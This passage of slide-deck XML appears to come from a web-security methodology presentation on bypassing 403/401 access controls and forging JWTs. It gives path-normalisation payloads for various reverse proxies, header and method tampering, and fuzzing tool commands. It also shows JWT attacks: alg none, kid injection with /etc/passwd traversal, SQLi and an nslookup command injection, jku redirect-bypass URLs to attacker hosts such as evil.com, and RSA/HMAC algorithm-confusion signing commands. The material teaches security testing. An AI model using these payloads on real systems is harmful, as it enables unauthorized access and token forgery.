                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authorization-response?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709" name="Google Shape;709;p8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/authorization-response?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10" name="Google Shape;710;p8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11" name="Google Shape;711;p8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8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13" name="Google Shape;71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8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15" name="Google Shape;715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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nginx As Reverse Proxy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 sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Weblogic As Backend</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , Use ;/../200-OK After authorization-response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e.g.  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authorization-response;/../200-OK </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass It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721" name="Google Shape;721;p8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/authorization-response;/../200-OK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22" name="Google Shape;722;p8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23" name="Google Shape;723;p8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8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25" name="Google Shape;72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8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727" name="Google Shape;727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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nginx As Reverse Proxy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 sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Apache</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> As Backend</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Try To Use //../ After  authorization-response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e.g.  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/authorization-response//../ </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass It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733" name="Google Shape;733;p8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/authorization-response//../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34" name="Google Shape;734;p8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35" name="Google Shape;735;p8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8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37" name="Google Shape;73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8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739" name="Google Shape;739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Append %2e </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Before The Extension AND </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%3b</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> After The Extension With </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Static Extensions</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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authorization-response%2e/.php%3b.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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745" name="Google Shape;745;p8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/authorization-response%2e.php%3b.jpg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46" name="Google Shape;746;p8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47" name="Google Shape;747;p8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8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49" name="Google Shape;74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8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51" name="Google Shape;751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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Apache As Reverse Proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Try To Add </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%3F.Static-Extension</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> After  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authorization-response.dynamic-extension</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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757" name="Google Shape;757;p8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/authorization-response.php%3F.jpg/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58" name="Google Shape;758;p8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9" name="Google Shape;759;p8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8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61" name="Google Shape;76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8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763" name="Google Shape;763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8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Append json Extension </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>After The Endpoint e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authorization-response.json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769" name="Google Shape;769;p8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/authorization-response.json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70" name="Google Shape;770;p8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71" name="Google Shape;771;p8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8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73" name="Google Shape;77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75" name="Google Shape;775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8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77" name="Google Shape;777;p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 HTTP Request Method To e.g. ANYTHING , POST , PUT , HEAD</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> etc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783" name="Google Shape;783;p8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ANYTHING</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /authorization-response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84" name="Google Shape;784;p8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85" name="Google Shape;785;p8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8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87" name="Google Shape;78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8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89" name="Google Shape;789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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Varnish As Reverse Proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Try To Change HTTP Request Method To Lower-Case AND Upper-Case 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e.g.  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PoST OR Get </a:t>
            </a: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95" name="Google Shape;795;p8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GeT</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /authorization-response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96" name="Google Shape;796;p8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97" name="Google Shape;797;p8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8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99" name="Google Shape;79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8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801" name="Google Shape;801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8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03" name="Google Shape;803;p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100363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Add Tab Before The Method Of HTTP request</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100"/>
              <a:t> </a:t>
            </a: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809" name="Google Shape;809;p8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/authorization-response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10" name="Google Shape;810;p8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11" name="Google Shape;811;p8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8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13" name="Google Shape;81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8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15" name="Google Shape;815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Remove The Space That In The Host Header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e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ost:comapny.com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47" name="Google Shape;247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/authorization-response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H</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ost:www.company.com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48" name="Google Shape;248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9" name="Google Shape;249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51" name="Google Shape;2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Add \r\n Before The first Line Of The HTTP request</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100"/>
              <a:t> </a:t>
            </a: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821" name="Google Shape;821;p8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\r\n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GET /authorization-response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22" name="Google Shape;822;p8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23" name="Google Shape;823;p8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8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25" name="Google Shape;82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8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27" name="Google Shape;827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9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Content Type Header </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g. Content-type: 0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833" name="Google Shape;833;p9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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /authorization-response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Content-Type: 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34" name="Google Shape;834;p9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35" name="Google Shape;835;p9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9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37" name="Google Shape;83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9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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Apache As Reverse Proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Try To Use </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//./another-403 After </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authorization-response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e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/authorization-response//./another-403 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass It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845" name="Google Shape;845;p9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>
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/authorization-response//./another-403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46" name="Google Shape;846;p9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47" name="Google Shape;847;p9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9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49" name="Google Shape;84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9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851" name="Google Shape;851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2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-proxy URL " Using This Proxy	" -hc Status-Code " Hide A Specified Response Code From Output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57" name="Google Shape;857;p92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python3 403fuzzer.py -u http://www.company.com/authorization-response -proxy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                     http://127.0.0.1:8081 -c COOKIES -hc 401,403,404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58" name="Google Shape;858;p9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Automation Tools e.g.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403fuzzer.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR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bypass403</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Save Time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59" name="Google Shape;859;p92"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="399450" y="44695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-iL file.txt " URLs With 401 And 403 To Bypass		" -iL - " Read From stdin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60" name="Google Shape;860;p92"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="399550" y="3802200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./bypass403 -iL 401-403-URLs.txt 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61" name="Google Shape;861;p9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62" name="Google Shape;862;p9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9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64" name="Google Shape;864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0" name="Google Shape;870;p9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9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72" name="Google Shape;872;p9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JWT , Try To Decode JWT Then Change</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> alg </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> none</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> AND Remove The Signature e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eyJ----------------</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.eyJ----------------.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873" name="Google Shape;87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9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75" name="Google Shape;875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9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78" name="Google Shape;878;p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93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80" name="Google Shape;880;p9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25" y="3523363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93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="3879475"/>
            <a:ext cx="3128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82" name="Google Shape;882;p9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4538" y="3862100"/>
            <a:ext cx="659974" cy="50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9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88" name="Google Shape;888;p9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9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90" name="Google Shape;890;p9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Decode JWT , If There Is </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kid</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inject LFI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SQLi </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Command Injection Payloads</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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../../../../../etc/passwd </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>' UNION SELECT 'key';--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`nslookup me.com`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891" name="Google Shape;89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9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 Decode JWT Then See There Is kid In The Header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{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"alg" : "HS256", "typ" : "JWT", "kid" : "1"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}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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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Replace</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ../../../../../../etc/passwd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Encode JWT Again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93" name="Google Shape;893;p94"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="312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sp>
        <p:nvSpPr>
          <p:cNvPr id="894" name="Google Shape;894;p9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95" name="Google Shape;895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538" y="2582250"/>
            <a:ext cx="659974" cy="50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9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02" name="Google Shape;902;p9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9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04" name="Google Shape;904;p9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Decode JWT , If There Is </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jku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x5u</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Insert https://wwwAcompany.com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https://www.companyAcom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https://www.company.communication </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>As Value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05" name="Google Shape;90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9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 Decode JWT Then See There Are jku OR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   x5u In The Header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{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"alg" : "HS256", "jku" : "https://www.company.com"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}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Replace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https://www.company.com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To</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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   </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://wwwAcompany.com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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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Encode JWT Again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07" name="Google Shape;907;p9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08" name="Google Shape;908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9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4" name="Google Shape;914;p9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9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List Of Patterns To Bypass The Whitelist In Redirect jku OR x5u Parameter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16" name="Google Shape;916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96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258050" y="20390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18" name="Google Shape;918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950" y="2093400"/>
            <a:ext cx="510550" cy="3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96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258050" y="24585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920" name="Google Shape;920;p96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258050" y="28779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21" name="Google Shape;921;p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625" y="29253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96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="252625" y="327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23" name="Google Shape;923;p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1313" y="332553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96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https://me.com\@www.company.com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https://</a:t>
            </a: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company.com\@me.com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https://me.com/.www.company.com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https://</a:t>
            </a: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company.com/ @me.com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https://me.com\[</a:t>
            </a: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company.com]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me.com%ff@</a:t>
            </a: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company.com%2F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me.com%bf:@</a:t>
            </a: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company.com%2F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me.com%252f@</a:t>
            </a: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company.com%2F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//me.com%0a%2523.</a:t>
            </a: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me.com://</a:t>
            </a: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androideeplink://me.com\@</a:t>
            </a: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androideeplink://a@</a:t>
            </a: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company.com:@me.com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androideeplink://</a:t>
            </a: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https://company.com.me.com\@</a:t>
            </a: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company.com%252f@me.com%2fpath%2f%3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//me.com:%252525252f@</a:t>
            </a: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company.com.evil.com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evil.com#</a:t>
            </a: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evil.com?</a:t>
            </a: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/%09/me.com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me.com%09</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="950">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="950">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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/\me.com</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="950">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="925" name="Google Shape;925;p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3000" y="2472438"/>
            <a:ext cx="457600" cy="4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96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258050" y="3664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27" name="Google Shape;927;p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6725" y="37318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9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3" name="Google Shape;933;p9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9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35" name="Google Shape;935;p9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 RSA </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Public</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Key Is Leaked AND JWT Signed With RSA , Try To Use RSA Public Key To Sign JWT With alg </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HS256 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Make Algorithm confusion</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="17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36" name="Google Shape;93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9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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Steps to produce :-</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="115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50">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1 -</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Open Your Terminal</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="115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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Write This Commands</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    - </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cat Public-key.pem | xxd -p | tr -d "\\n"</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> echo -n "eyJ---.eyJ---" | openssl dgst -sha256 </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        -mac HMAC -macopt hexkey:OUT-First-Command</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> python2 -c "exec(\"import base64, binascii\nprint </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        base64.urlsafe_b64encode(binascii.a2b_hex</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        ('OUT-Second-Command')).replace('=','')\")"</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="11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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3 - Use The Output As Signature</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1150">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="938" name="Google Shape;938;p9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39" name="Google Shape;939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97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41" name="Google Shape;941;p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523363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97"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="312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943" name="Google Shape;943;p9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4538" y="2582250"/>
